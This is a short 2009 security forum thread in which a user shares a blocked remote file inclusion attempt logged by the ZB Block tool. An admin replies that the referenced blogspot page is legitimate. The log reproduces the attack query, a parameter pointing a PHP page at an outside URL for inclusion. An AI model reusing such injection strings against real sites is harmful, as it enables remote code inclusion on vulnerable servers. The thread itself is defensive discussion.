Strange RFI attempt

This forum is for testing I do with various security settings and tools. Infection infiltration, security lock down among other things. Currently XP Home-w\SP 2 installed

Moderators: Admin Team, Moderators

User avatar
zaphod
Posts: 100
Joined: Fri Sep 04, 2009 5:53 am
Area Of Expertise: XP, PHP
experience: Just call me Mr. Gates
PC time: What else is there in life?
Location: Casper, WY
Contact:

Strange RFI attempt

Postby zaphod » Sun Nov 08, 2009 6:54 pm

For lack of a better forum to put it in, I have a strange Remote file inclusion attempt I would like to share with you all.

If any mod knows a better forum on here for this message, please move it.

Here's the RFI I got...

Code: Select all

#: 13724 @: Sun,  8 Nov 2009 17:54:35 -0700
Host: host49-175-dynamic.61-82-r.retail.telecomitalia.it
IP: 82.61.175.49
Score: 3
Why blocked: Question mark at end of query. RFI (http). Spammer tolerant host network.
Query: f=http://owned-nets.blogspot.com/2009/05/pro0f3th1sddbluelinebe.html?
Referer:
User Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.9) Gecko/2009040821 Firefox/3.0.9
Reconstructed URL: http:// www.spambotsecurity.c0m /forum/viewtopic.php?f=http://owned-nets.blogspot.com/2009/05/pro0f3th1sddbluelinebe.html?
I checked out the page on blogspot, but saw no hostile code on it, well, none that immediately caught my eye. Does anyone see hostile crap buried in there? Could this be a slandering attempt against that page?

Zap hm? (Feeling a little amused, and a little unsure.)
Get Protected, Stay Protected...
SpambotSecurity.com , The home of ZB Block

User avatar
MysteryFCM
Site Admin
Site Admin
Posts: 3721
Joined: Sun May 15, 2005 12:42 pm
Location: Newcastle, UK
Contact:

Re: Strange RFI attempt

Postby MysteryFCM » Mon Nov 09, 2009 11:01 am

The blog is legit. It's entirely possible they're pulling the code from his post, but more likely they're just trying to fool people into thinking he's involved.
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

Keeping it FREE!


Return to “TeMerc Test Box”

Who is online

Users browsing this forum: No registered users and 1 guest